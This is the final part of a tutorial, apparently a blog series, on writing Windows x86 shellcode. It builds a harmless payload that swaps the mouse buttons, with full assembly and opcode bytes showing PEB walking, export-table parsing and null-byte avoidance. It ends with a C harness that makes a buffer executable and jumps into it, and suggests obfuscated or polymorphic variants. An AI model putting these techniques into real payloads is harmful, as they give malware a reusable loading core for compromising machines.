If you missed the first two parts of this article, you can find in Part I what is a shellcode, how it works and which are its limitations and in Part II you can read about the PEB (Process Environment Block) structure, the PE (.exe, .dll) file format and you can go through a short ASM introduction. You’ll need this information in order to properly understand Windows shellcodes.

In this last part of the shellcode development introduction, we will write a simple “SwapMouseButton” shellcode, a shellcode that will swap left and right mouse buttons. We will start from an existing shellcode: “Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode“. The shellcode name tells us a few things, such like it uses:

URLDownloadToFile Windows API function to download a file WinExec to execute the file (executable file: .exe) ExitProcess will terminate the process running the shellcode

Using this example, we will call SwapMouseButton function and ExitProcess function. I’m pretty sure it is easy to understand what these functions do.

BOOL WINAPI SwapMouseButton( _In_ BOOL fSwap ); VOID WINAPI ExitProcess( _In_ UINT uExitCode );

As you can see, each function has only one parameter:

fSwap parameter can be TRUE or FALSE. If it is TRUE, the mouse buttons are swapped, else they are restored.

uExitCode represents the process exit code. Each process must return a value on exit (zero if everything was ok, any other value otherwise). This is the “return 0” of the main function.

Program overview

So we need to call two functions. In C++, we can do it pretty simple:

The compiler knows to link with the “user32” library and to find the function. But we must do this manually in the shellcode. We need to manually load the “user32” library, find the address of the “SwapMouseButton” function and call it.

But here, the compiler knows the address of the “LoadLibrary” and “GetProcAddress” functions. In the shellcode, we must find them programatically.

Note that we do not have to call “ExitProcess” function in C++ because on “return 0” from “main” function, the program will be terminated, but from a shellcode we call it to make sure the program terminates gracefully and does not crash.

Shellcode overview

As we discussed in the previous parts, in order to make a reliable shellcode, we need to follow a few steps. We know what functions we have to call but first, we have to find these functions.

The necessary steps are the following:

Find where kernel32.dll is loaded into memory Find its export table Find GetProcAddress function exported by kernel32.dll Use GetProcAddress to find the address of the LoadLibrary function Use LoadLibrary to load user32.dll library Find the address of the SwapMouseButton function within user32.dll Call SwapMouseButton function Find the address of the ExitProcess function Call ExitProcess function

In order to write our shellcode, we will use Visual Studio 2015 (you can use any other version or an assembler such as masm, nasm etc.). In Visual Studio, we can use “__asm { }” is order to directly write ASM code.

Please make sure you have properly read and understood this part.

#include "stdafx.h" int main() { __asm { // ASM code here } return 0; }

Find kernel32.dll base address

As you can see below, we can find where kernel32.dll library is loaded into memory using the following code:

xor ecx, ecx mov eax, fs:[ecx + 0x30] ; EAX = PEB mov eax, [eax + 0xc] ; EAX = PEB->Ldr mov esi, [eax + 0x14] ; ESI = PEB->Ldr.InMemOrder lodsd ; EAX = Second module xchg eax, esi ; EAX = ESI, ESI = EAX lodsd ; EAX = Third(kernel32) mov ebx, [eax + 0x10] ; EBX = Base address

(Lines 1-2) Let’s see what it does. It sets ecx register to zero and use it in the second instruction. But why? Remember when we talked about avoiding NULL bytes? The “mov eax,fs:[30]” instruction will be assembled in the following opcode sequence: “64 A1 30 00 00 00”, so we have null bytes, while “mov eax, fs:[ecx+0x30]” instruction will be assembled to “64 8B 41 30”. So this way it is possible to avoid NULL bytes.

(Lines 3-4) Now we have the PEB pointer in the eax register. As we see in the previous blog post, at the 0xC offset we can find the Ldr, we follow that pointer and in the Ldr at the 0x14 offset we have the “in memory order” modules list.

(Lines 5-7) We are now placed on the “program.exe” module, on the “InMemoryOrderLinks”. Here, first element is “Flink”, a pointer to the next module. You can see that we placed this pointer in the esi register. The “lodsd” instruction will follow the pointer specified by the esi register and we will have the result in the eax register. This means that after the lodsd instruction we will have the second module, ntdll.dll, in the eax register. We place this pointer in the esi by exchanging the values of eax and esi and use again the lodsd instruction to reach the 3rd module: kernel32.dll.

(Line 8) At this point, we have in the eax register, the pointer to “InMemoryOrderLinks” of kernel32.dll. Adding 0x10 bytes will give us the “DllBase” pointer, the address of memory where kernel32.dll is loaded. Target aquired!

Find the export table of kernel32.dll

We found the kernel32.dl in memory. Now we need to parse this PE file and find the export table. This is not really complicated:

mov edx, [ebx + 0x3c] ; EDX = DOS->e_lfanew add edx, ebx ; EDX = PE Header mov edx, [edx + 0x78] ; EDX = Offset export table add edx, ebx ; EDX = Export table mov esi, [edx + 0x20] ; ESI = Offset names table add esi, ebx ; ESI = Names table xor ecx, ecx ; EXC = 0

(Lines 1-2) We know that we can find the “e_lfanew” pointer at the offset 0x3C, because the size of the MS-DOS header is 0x40 bytes and the last 4 bytes are the “e_lfanew” pointer. We add this value to the base address, because the pointer is relative to the base address (it is an offset).

(Lines 3-4) At the offset 0x78 of the PE header, we can find the “DataDirectory” for the exports. We know this because the size of all PE headers (Signature, FileHeader and OptionalHeader) before the DataDirectory is exactly 0x78 bytes and the export is the first entry in the DataDirectory table. Again, we add this value to the edx register and we are now placed on the export table of the kernel32.dll.

(Lines 5-7) In the IMAGE_EXPORT_DIRECTORY structure, at the offset 0x20 we can find the pointer to the “AddressOfNames” so we can get the exported function names. This is required because we try to find the function by its name even if it is possible using some other methods. We save the pointer in the esi register and set ecx register to 0 (you will see below why).

Find GetProcAddress function name

We are now placed on the “AddressOfNames”, an array of pointers (relative to the image base, the address where kernel32.dll is loaded into memory). So each 4 bytes will represent a pointer to a function name. We can find the function name, and the function name ordinal (the “number” of the GetProcAddress function) like this:

Get_Function: inc ecx ; Increment the ordinal lodsd ; Get name offset add eax, ebx ; Get function name cmp dword ptr[eax], 0x50746547 ; GetP jnz Get_Function cmp dword ptr[eax + 0x4], 0x41636f72 ; rocA jnz Get_Function cmp dword ptr[eax + 0x8], 0x65726464 ; ddre jnz Get_Function

(Lines 1-3) First line “does nothing”. It is a label, a name for a location where we will jump in order to read of the function names, as you will see below. In line 3, we increment ecx register, which will be the counter of our functions and the function ordinal number.

(Lines 4-5) We have in the esi register, the pointer to the first function name. The lodsd instruction will place in eax the offset to the function name (e.g. “ExportedFunction”) and we add this with the ebx (kernel32 base address) in order to find the correct pointer. Note that the “lodsd” instruction will also increment the esi register value with 4! This helps us because we do not have to increment it manually, we just need to call again lodsd in order to get next function name pointer.

(Lines 6-11) We have now in the eax register a correct pointer to the exported function name. So there is a string containing the function name, we need to check if this function is “GetProcAddress”. In line 6, we compare the exported function name to “0x50746547” this being actually “50 74 65 47” ascii values meaning “PteG”. You may guess that reverse it is “GetP”, the first 4 bytes of the “GetProcAddress”, but x86 processors use little-endian method which means the numbers are stored in memory in reverse order of their bytes! So, we compare if the first 4 bytes of the current function name are “GetP”. If they are not, jnz instruction will jump again at our label and it will continue with the next function name. If it is, we also check the next 4 bytes, they must be “rocA” and next 4 bytes “ddre” in order to be sure we do not find other function that starts with “GetP”.

Find the address of GetProcAddress function

At this point we only found the ordinal of the GetProcAddress function, but we can use it in order to find the actual address of this function:

mov esi, [edx + 0x24] ; ESI = Offset ordinals add esi, ebx ; ESI = Ordinals table mov cx, [esi + ecx * 2] ; CX = Number of function dec ecx mov esi, [edx + 0x1c] ; ESI = Offset address table add esi, ebx ; ESI = Address table mov edx, [esi + ecx * 4] ; EDX = Pointer(offset) add edx, ebx ; EDX = GetProcAddress

(Lines 1-2) At this point we have in edx a pointer to the IMAGE_EXPORT_DIRECTORY structure. At the offset 0x24 of the structure we can find the “AddressOfNameOrdinals” offset. In line 2, we add this offset to ebx register which is the image base of the kernel32.dll so we get a valid pointer to the name ordinals table.

(Lines 3-4) The esi register contains the pointer to the name ordinals array. This array contains two byte numbers. We have the name ordinal number (index) of GetProcAddress function in the ecx register, so this way we get the function address ordinal (index). This will help us to get the function address. We have to decrement the number because the name ordinals starts from 0.

(Lines 5-6) At the offset 0x1c we cand find the “AddressOfFunctions”, the pointer to the function pointer array. We just add the image base of kernel32.dll and we are placed at the beginning of the array.

(Lines 7-8) Now that we have the correct index for the “AddressOfFunctions” array in ecx, we just find the GetProcAddress function pointer (relative to the image base) at the AddressOfFunctions[ecx] location. We use “ecx * 4” because each pointer has 4 bytes and esi points to the beginning of the array. In line 8, we add the image base so we will have in the edx the pointer to the GetProcAddress function. Target aquired!

Find the LoadLibrary function address

The bad news is that we didn’t do anything “useful” up to this point. The good news is that we did what was complicated and now we can have fun!

xor ecx, ecx ; ECX = 0 push ebx ; Kernel32 base address push edx ; GetProcAddress push ecx ; 0 push 0x41797261 ; aryA push 0x7262694c ; Libr push 0x64616f4c ; Load push esp ; "LoadLibrary" push ebx ; Kernel32 base address call edx ; GetProcAddress(LL)

(Lines 1-3) First, we set ecx to zero because we will use it later. Second, lines two and three, we save on the stack, for future, the ebx which is the kernel32 base address and the edx which is the pointer to the GetProcAddress function.

(Lines 4-10) Now we have to make the following call: GetProcAddress(kernel32, “LoadLibraryA”). We have the kernel32 address, but how can we use a string? We will use again the stack. We will place the “LoadLibraryA\0” string on the stack. Yes, the string must be NULL terminated so this is why we set ecx to 0 and on line 4 we place it on the stack. We place the “LoadLibraryA” string on the stack 4 bytes at a time, in reverse order. We place first “aryA”, then “Libr” and then “Load” so the string on the stack will be “LoadLibraryA”. Done! Now, as we placed the data on the stack, the esp register, the stack pointer, will point to the beginning of our “LoadLibraryA” string. We now place the function parameters on the stack, from the last one to the first one, so first the esp in line 8, then the ebx, kernel32 base address on line 9 and we call edx which is the GetProcAddress pointer. And that’s all!

Note that we placed on the stack “LoadLibraryA”, not only “LoadLibrary”. This is because the kernel32.dll does not export a “LoadLibrary” function, instead it exports two functions: “LoadLibraryA” which is used for ANSI string parameters and “LoadLibraryW” which is used for Unicode string parameters.

Load user32.dll library

We previously found the LoadLibrary function address, we will use it now to load into memory the “user32.dll” library which contains our SwapMouseButton function.

add esp, 0xc ; pop "LoadLibraryA" pop ecx ; ECX = 0 push eax ; EAX = LoadLibraryA push ecx mov cx, 0x6c6c ; ll push ecx push 0x642e3233 ; 32.d push 0x72657375 ; user push esp ; "user32.dll" call eax ; LoadLibrary("user32.dll")

(Lines 1-3) As you saw, we placed on the stack the “LoadLibraryA” string before. So we have to get rid of this. The easiest way, instead of three “pops”, we can just add 0xc (meaning 12 bytes of the string) to the esp register and we are done. In line two, we also remove the 0 placed on the stack before calling the function and ecx register will be set to 0. We now backup for future use the LoadLibrary function address on the stack, because as you know, after calling a function, the return data will be saved in the eax register.

(Lies 4-10) We want to call “LoadLibrary(“user32.dll”)”. So we need again to place a string on the stack. It is a bit more tricky now, because the string length is not a multiple of 4 bytes and we cannot directly place it with a few push instructions. Instead, we first place the ecx which is 0 on the stack, the we use the CX register to place the “ll” string. CX register represents a half of the ecx register, it’s lowest part. So we can place it on the stack now. In lines 7-8 we place the “user32.d” string so now, at esp we have the “user32.dll” string. We push this parameter on the stack to load the library and this will also return in eax the user32.dll library base address, the address where the DLL is loaded into memory. We will need it later.

Get SwapMouseButton function address

We loaded into memory the user32.dll library, now we want to call GetProcAddress to get the address of the SwapMouseButton function.

add esp, 0x10 ; Clean stack mov edx, [esp + 0x4] ; EDX = GetProcAddress xor ecx, ecx ; ECX = 0 push ecx mov ecx, 0x616E6F74 ; tona push ecx sub dword ptr[esp + 0x3], 0x61 ; Remove "a" push 0x74754265 ; eBut push 0x73756F4D ; Mous push 0x70617753 ; Swap push esp ; "SwapMouseButton" push eax ; user32.dll address call edx ; GetProc(SwapMouseButton)

(Lines 1-2) As before, we have to clean the stack. In line two, we place in the edx register the GetProcAddress function address which we saved before. As a mention, after a function call, the eax, ecx and edx will be probably modified because they are not preserved.

(Lines 3-13) We want to call “GetProcAddress(user32.dll, “SwapMouseButton”)” so again we have to place a string on the stack. First, in line 3-4 we set ecx register to 0 and place it on the stack. Second, we place on the stack “tona”. The “ton” string represents the last 3 bytes of the “SwapMouseButton” string but we also place an “a” character. This is a trick we can use and in line 7, we substract 0x61 from the stack, from the location where we placed that “a” character. “a” is 0x61 and this means we transformed the “a” character into NULL. Now, as before, we place the rest of the string on the stack. We push the eax register which contains the user32.dll base address and call GetProcAddress function. Please note that you can do this stuff however you want to do it, there may be easier ways to do it so just have fun!

Call SwapMouseButton function

Cool, we have the address of the SwapMouseButton function, we just need to call it using the “true” parameter.

add esp, 0x14 ; Cleanup stack xor ecx, ecx ; ECX = 0 inc ecx ; true push ecx ; 1 call eax ; Swap!

(Lines 1-5) I know it’s boring, but we have to clean the stack. We want to call “SwapMouseButton(true)” so “SwapMouseButton(1)” so we need to push the “1” value on the stack. We just set ecx register to 0 and increment it. We place it on the stack and call the SwapMouseButton function. If you want to restore the mouse functionality, just remove the “inc ecx” instruction.

Get ExitProcess function address

Phew, we did our stuff, but we want to gracefully exit the process so we need to find the ExitProcess function within kernel32.dll.

add esp, 0x4 ; Clean stack pop edx ; GetProcAddress pop ebx ; kernel32.dll base address mov ecx, 0x61737365 ; essa push ecx sub dword ptr [esp + 0x3], 0x61 ; Remove "a" push 0x636f7250 ; Proc push 0x74697845 ; Exit push esp push ebx ; kernel32.dll base address call edx ; GetProc(Exec)

(Lines 1-3) Again, clean the “1” value from the stack. We get also from the stack the data we backed up at the beginning, the GetProcAddress function address in the edx register and the kernel32 base address in the ebx register.

(Lines 4-11) As you are already familiar with, we place on the stack the “ExitProcessa” string and replace the last “a” character with a NULL byte. We place the parameters on the stack and call GetProcAddress to get the ExitProcess function address.

Call the ExitProcess function

Finally, we call the ExitProcess function like this: “ExitProcess(0)”.

xor ecx, ecx ; ECX = 0 push ecx ; Return code = 0 call eax ; ExitProcess

(Lines 1-3) We have to place a “0” on the stack, so we just set ecx to 0, place it on the stack and call the ExitProcess function. And that’s all.

Final shellcode

Now we just need to add all parts together and the final shellcode is the following:

xor ecx, ecx mov eax, fs:[ecx + 0x30] ; EAX = PEB mov eax, [eax + 0xc] ; EAX = PEB->Ldr mov esi, [eax + 0x14] ; ESI = PEB->Ldr.InMemOrder lodsd ; EAX = Second module xchg eax, esi ; EAX = ESI, ESI = EAX lodsd ; EAX = Third(kernel32) mov ebx, [eax + 0x10] ; EBX = Base address mov edx, [ebx + 0x3c] ; EDX = DOS->e_lfanew add edx, ebx ; EDX = PE Header mov edx, [edx + 0x78] ; EDX = Offset export table add edx, ebx ; EDX = Export table mov esi, [edx + 0x20] ; ESI = Offset namestable add esi, ebx ; ESI = Names table xor ecx, ecx ; EXC = 0 Get_Function: inc ecx ; Increment the ordinal lodsd ; Get name offset add eax, ebx ; Get function name cmp dword ptr[eax], 0x50746547 ; GetP jnz Get_Function cmp dword ptr[eax + 0x4], 0x41636f72 ; rocA jnz Get_Function cmp dword ptr[eax + 0x8], 0x65726464 ; ddre jnz Get_Function mov esi, [edx + 0x24] ; ESI = Offset ordinals add esi, ebx ; ESI = Ordinals table mov cx, [esi + ecx * 2] ; Number of function dec ecx mov esi, [edx + 0x1c] ; Offset address table add esi, ebx ; ESI = Address table mov edx, [esi + ecx * 4] ; EDX = Pointer(offset) add edx, ebx ; EDX = GetProcAddress xor ecx, ecx ; ECX = 0 push ebx ; Kernel32 base address push edx ; GetProcAddress push ecx ; 0 push 0x41797261 ; aryA push 0x7262694c ; Libr push 0x64616f4c ; Load push esp ; "LoadLibrary" push ebx ; Kernel32 base address call edx ; GetProcAddress(LL) add esp, 0xc ; pop "LoadLibrary" pop ecx ; ECX = 0 push eax ; EAX = LoadLibrary push ecx mov cx, 0x6c6c ; ll push ecx push 0x642e3233 ; 32.d push 0x72657375 ; user push esp ; "user32.dll" call eax ; LoadLibrary("user32.dll") add esp, 0x10 ; Clean stack mov edx, [esp + 0x4] ; EDX = GetProcAddress xor ecx, ecx ; ECX = 0 push ecx mov ecx, 0x616E6F74 ; tona push ecx sub dword ptr[esp + 0x3], 0x61 ; Remove "a" push 0x74754265 ; eBut push 0x73756F4D ; Mous push 0x70617753 ; Swap push esp ; "SwapMouseButton" push eax ; user32.dll address call edx ; GetProc(SwapMouseButton) add esp, 0x14 ; Cleanup stack xor ecx, ecx ; ECX = 0 inc ecx ; true push ecx ; 1 call eax ; Swap! add esp, 0x4 ; Clean stack pop edx ; GetProcAddress pop ebx ; kernel32.dll base address mov ecx, 0x61737365 ; essa push ecx sub dword ptr [esp + 0x3], 0x61 ; Remove "a" push 0x636f7250 ; Proc push 0x74697845 ; Exit push esp push ebx ; kernel32.dll base address call edx ; GetProc(Exec) xor ecx, ecx ; ECX = 0 push ecx ; Return code = 0 call eax ; ExitProcess

And this is how we wrote our first (useful) shellcode!

Testing the shellcode

We can test the shellcode with the following code:

#include "stdafx.h" #include <Windows.h> int main() { char *shellcode = "\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72\x65\x75" "\xE2\x8B\x72\x24\x03\xF3\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3\x8B\x14\x8E\x03\xD3\x33\xC9\x53\x52\x51\x68\x61\x72\x79\x41\x68" "\x4C\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C\x51\x68\x33\x32\x2E\x64\x68\x75\x73" "\x65\x72\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24\x04\x33\xC9\x51\xB9\x74\x6F\x6E\x61\x51\x83\x6C\x24\x03\x61\x68\x65\x42\x75\x74\x68" "\x4D\x6F\x75\x73\x68\x53\x77\x61\x70\x54\x50\xFF\xD2\x83\xC4\x14\x33\xC9" "\x41" // inc ecx - Remove this to restore the functionality "\x51\xFF\xD0\x83\xC4\x04\x5A\x5B\xB9\x65\x73\x73\x61" "\x51\x83\x6C\x24\x03\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69\x74\x54\x53\xFF\xD2\x33\xC9\x51\xFF\xD0"; // Set memory as executable DWORD old = 0; BOOL ret = VirtualProtect(shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &old); // Call the shellcode __asm { jmp shellcode; } return 0; }

Conclusion

I hope you have learned step by step how a Windows shellcode works and now you should be able to customize the ASM code that we have created in this article. Even if this shellcode does not do something very useful, it is a good starting point to write one yourself.

You may try to obfuscate it, to create an alpha-numeric one or even a polymorphic one. I just suggest you to try write your own shellcode in order to really understand the challenges behind writing this type of code.